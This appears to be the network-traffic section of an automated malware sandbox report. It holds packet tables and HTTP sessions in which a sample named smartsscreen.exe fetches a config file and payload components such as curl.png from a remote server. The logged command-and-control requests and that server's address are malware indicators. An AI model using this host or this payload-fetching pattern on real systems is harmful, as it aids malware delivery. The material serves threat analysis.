May 29, 2024 14:25:49.022628069 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.023381948 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.024960041 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.025007963 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.025022984 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.025034904 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.025065899 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.300955057 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.300970078 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301029921 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301331043 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301455021 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301466942 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301477909 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301489115 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301501989 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301507950 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301513910 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301538944 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301598072 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301629066 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301640987 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301743031 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301762104 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301774025 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301784992 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301788092 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301800966 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301812887 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301814079 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301827908 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301839113 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301839113 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301852942 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.301867962 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.301888943 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.302565098 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.302607059 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.302618980 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.302654028 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.302680016 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.302691936 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.302701950 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.302712917 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.302731037 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.302762032 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.303164005 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303175926 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303211927 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.303258896 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303271055 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303282022 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303292990 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303304911 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.303333998 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.303601980 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303616047 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303651094 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.303708076 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303719997 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303730965 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.303755999 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.303793907 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.581172943 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581193924 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581204891 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581233978 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581243992 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581245899 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.581258059 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581286907 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.581298113 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.581302881 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581314087 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581325054 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581335068 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581348896 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.581370115 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.581849098 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581888914 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581899881 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.581937075 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.582016945 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582043886 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582052946 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.582057953 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582103014 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.582120895 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582323074 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582387924 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.582402945 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582413912 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582425117 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582434893 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582444906 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.582447052 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.582468033 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.635215044 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.674341917 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.689383984 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:49.697046995 CEST	80	49766	111.90.158.40	192.168.2.4
May 29, 2024 14:25:49.697105885 CEST	49766	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:52.688410044 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:52.693830013 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:52.693948984 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:52.694067001 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:52.699445009 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.098925114 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:54.104168892 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:25:54.104269028 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:54.104404926 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:25:54.109699965 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:25:54.244415045 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244462967 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244534016 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244592905 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.244637012 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244673014 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244707108 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244728088 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.244740009 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244752884 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.244774103 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244806051 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.244821072 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.244842052 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.246865034 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.250332117 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.250390053 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.250437975 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.250484943 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.533643007 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.533663034 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.533673048 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.533684969 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.533695936 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.533724070 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.533802986 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.874634027 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:54.882781029 CEST	80	49767	111.90.158.40	192.168.2.4
May 29, 2024 14:25:54.882843018 CEST	49767	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:55.083285093 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:25:55.136620998 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:26:12.923273087 CEST	49739	80	192.168.2.4	192.229.221.95
May 29, 2024 14:26:12.923562050 CEST	49737	80	192.168.2.4	199.232.214.172
May 29, 2024 14:26:12.923562050 CEST	49738	80	192.168.2.4	199.232.214.172
May 29, 2024 14:26:12.927407026 CEST	49740	80	192.168.2.4	199.232.214.172
May 29, 2024 14:26:12.928685904 CEST	80	49739	192.229.221.95	192.168.2.4
May 29, 2024 14:26:12.929333925 CEST	80	49737	199.232.214.172	192.168.2.4
May 29, 2024 14:26:12.929368019 CEST	80	49738	199.232.214.172	192.168.2.4
May 29, 2024 14:26:12.929378986 CEST	49739	80	192.168.2.4	192.229.221.95
May 29, 2024 14:26:12.929423094 CEST	49737	80	192.168.2.4	199.232.214.172
May 29, 2024 14:26:12.929423094 CEST	49738	80	192.168.2.4	199.232.214.172
May 29, 2024 14:26:12.932668924 CEST	80	49740	199.232.214.172	192.168.2.4
May 29, 2024 14:26:12.933399916 CEST	49740	80	192.168.2.4	199.232.214.172
May 29, 2024 14:26:20.872071028 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:20.872117996 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:20.872184038 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:20.875823975 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:20.875837088 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:21.872203112 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:21.872293949 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:21.895354986 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:21.895373106 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:21.896171093 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:21.901285887 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:21.948503017 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:22.524152994 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:22.524269104 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:22.524540901 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:22.526712894 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:22.526712894 CEST	49771	443	192.168.2.4	111.90.158.40
May 29, 2024 14:26:22.526736975 CEST	443	49771	111.90.158.40	192.168.2.4
May 29, 2024 14:26:32.517597914 CEST	49772	25	192.168.2.4	111.90.158.40
May 29, 2024 14:26:33.632126093 CEST	49772	25	192.168.2.4	111.90.158.40
May 29, 2024 14:26:35.638353109 CEST	49772	25	192.168.2.4	111.90.158.40
May 29, 2024 14:26:39.787369967 CEST	49772	25	192.168.2.4	111.90.158.40
May 29, 2024 14:26:47.981888056 CEST	49772	25	192.168.2.4	111.90.158.40
May 29, 2024 14:26:56.725522995 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:26:56.730691910 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:26:57.108900070 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:26:57.210906029 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:27:24.160375118 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:24.160414934 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:24.160504103 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:24.160732031 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:24.160748005 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.162596941 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.162719965 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:25.164272070 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:25.164295912 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.164598942 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.164809942 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:25.212501049 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.821367979 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.821563959 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.821567059 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:25.821567059 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:25.821614981 CEST	443	49773	111.90.158.40	192.168.2.4
May 29, 2024 14:27:25.821679115 CEST	49773	443	192.168.2.4	111.90.158.40
May 29, 2024 14:27:35.811438084 CEST	49774	25	192.168.2.4	111.90.158.40
May 29, 2024 14:27:36.939934969 CEST	49774	25	192.168.2.4	111.90.158.40
May 29, 2024 14:27:38.946789026 CEST	49774	25	192.168.2.4	111.90.158.40
May 29, 2024 14:27:42.947520018 CEST	49774	25	192.168.2.4	111.90.158.40
May 29, 2024 14:27:51.044991970 CEST	49774	25	192.168.2.4	111.90.158.40
May 29, 2024 14:27:57.325613022 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:27:57.336822033 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:27:57.712769985 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:27:57.761060953 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:28:27.157545090 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:27.157589912 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:27.159528971 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:27.159651995 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:27.159668922 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.149473906 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.149552107 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:28.150774002 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:28.150783062 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.151112080 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.151268005 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:28.196504116 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.815411091 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.815516949 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.815581083 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:28.815617085 CEST	443	49775	111.90.158.40	192.168.2.4
May 29, 2024 14:28:28.815629005 CEST	49775	443	192.168.2.4	111.90.158.40
May 29, 2024 14:28:38.847085953 CEST	49776	25	192.168.2.4	111.90.158.40
May 29, 2024 14:28:39.864672899 CEST	49776	25	192.168.2.4	111.90.158.40
May 29, 2024 14:28:41.871757030 CEST	49776	25	192.168.2.4	111.90.158.40
May 29, 2024 14:28:45.874166012 CEST	49776	25	192.168.2.4	111.90.158.40
May 29, 2024 14:28:53.880438089 CEST	49776	25	192.168.2.4	111.90.158.40
May 29, 2024 14:28:58.638942003 CEST	49768	80	192.168.2.4	111.90.143.130
May 29, 2024 14:28:58.644387960 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:28:59.022880077 CEST	80	49768	111.90.143.130	192.168.2.4
May 29, 2024 14:28:59.091547012 CEST	49768	80	192.168.2.4	111.90.143.130

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 29, 2024 14:25:17.663616896 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.887940884 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.335737944 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.613915920 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:20.494682074 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:21.495491982 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:22.716357946 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:24.160273075 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.158180952 CEST	54269	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:22.559700966 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:22.783850908 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:23.230058908 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:24.197702885 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:25.011478901 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:26.056435108 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:27.847831964 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:29.243901014 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:26:30.875684977 CEST	53217	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:25.824506998 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:26.049377918 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:26.497180939 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:27.200051069 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:28.083688021 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:29.105313063 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:30.420367002 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:31.898976088 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:33.589477062 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:27:35.462635994 CEST	53218	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:28.822308064 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:29.046550989 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:29.490036011 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:30.419589996 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:31.186319113 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:32.206063986 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:33.572506905 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:35.053975105 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:36.734420061 CEST	53219	53	192.168.2.4	111.90.158.40
May 29, 2024 14:28:38.582922935 CEST	53219	53	192.168.2.4	111.90.158.40

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 29, 2024 14:25:18.619057894 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:25:19.897233963 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:25:20.777925968 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:25:21.779687881 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:25:23.001868963 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:25:24.443650961 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:25:27.441184044 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:26:22.843312979 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:26:23.067519903 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:26:29.527110100 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:27:26.108494997 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:27:26.332680941 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:27:28.366854906 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:27:29.388375044 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:27:33.873250008 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:28:29.773202896 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:28:33.855844021 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:28:35.337344885 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable
May 29, 2024 14:28:37.017658949 CEST	111.90.158.40	192.168.2.4	cd9b	(Port unreachable)	Destination Unreachable

HTTP Request Dependency Graph

1.1.1.1

111.90.158.40:80

111.90.158.40

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49744	111.90.158.40	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:14.990796089 CEST	275	OUT	GET /config.txt?t=1716985514 HTTP/1.1 Host: 111.90.158.40:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Content-Type: application/octet-stream Accept-Encoding: gzip Connection: close
May 29, 2024 14:25:15.966005087 CEST	960	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 May 2024 20:26:23 GMT Content-Type: text/plain Content-Length: 717 Last-Modified: Thu, 28 Mar 2024 10:20:56 GMT Connection: close ETag: "66054488-2cd" Accept-Ranges: bytes Data Raw: 7b 0a 09 22 76 22 3a 22 76 33 2e 30 22 2c 0a 09 22 63 75 72 6c 22 3a 22 35 32 66 66 37 38 63 36 34 37 64 31 38 63 61 36 38 35 35 32 64 65 61 34 65 31 62 35 31 63 37 35 38 32 65 33 62 31 33 30 32 61 66 31 37 31 61 39 37 63 61 36 34 31 64 33 35 36 32 66 30 35 36 31 22 2c 0a 09 22 78 6d 22 3a 22 33 35 65 62 33 36 38 63 31 34 61 64 32 35 65 33 62 31 63 35 38 35 37 39 65 62 61 65 61 65 37 31 62 64 64 38 65 66 37 66 39 63 63 65 63 66 63 30 30 34 37 34 61 61 30 36 36 62 33 32 61 30 33 66 22 2c 0a 09 22 78 6d 63 22 3a 22 63 31 66 34 35 34 38 32 36 31 31 39 62 65 33 38 65 33 66 66 62 30 33 34 36 35 37 32 36 33 31 63 61 35 65 38 31 62 31 62 30 37 35 66 38 62 32 33 35 39 64 35 61 66 62 62 34 65 32 31 35 38 36 30 22 2c 0a 09 22 78 6d 73 22 3a 22 31 31 62 64 32 63 39 66 39 65 32 33 39 37 63 39 61 31 36 65 30 39 39 30 65 34 65 64 32 63 66 30 36 37 39 34 39 38 66 65 30 66 64 34 31 38 61 33 64 66 64 61 63 36 30 62 35 63 31 36 30 65 65 35 22 2c 0a 09 22 73 6d 61 72 74 22 3a 22 32 66 65 37 38 39 34 31 64 37 34 64 33 [TRUNCATED] Data Ascii: {"v":"v3.0","curl":"52ff78c647d18ca68552dea4e1b51c7582e3b1302af171a97ca641d3562f0561","xm":"35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f","xmc":"c1f454826119be38e3ffb0346572631ca5e81b1b075f8b2359d5afbb4e215860","xms":"11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5","smart":"2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753","scan":"stop","ms86":"3b2724f3350cb5f017db361bd7aae49a8dbc6faa7506de6a4b8992ef3fd9d7ab","ms64":"3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150","dkill":"4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1","ddelete":"2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49746	111.90.158.40	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:15.974864960 CEST	273	OUT	GET /curl.png?t=1716985515 HTTP/1.1 Host: 111.90.158.40:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Content-Type: application/octet-stream Accept-Encoding: gzip Connection: close
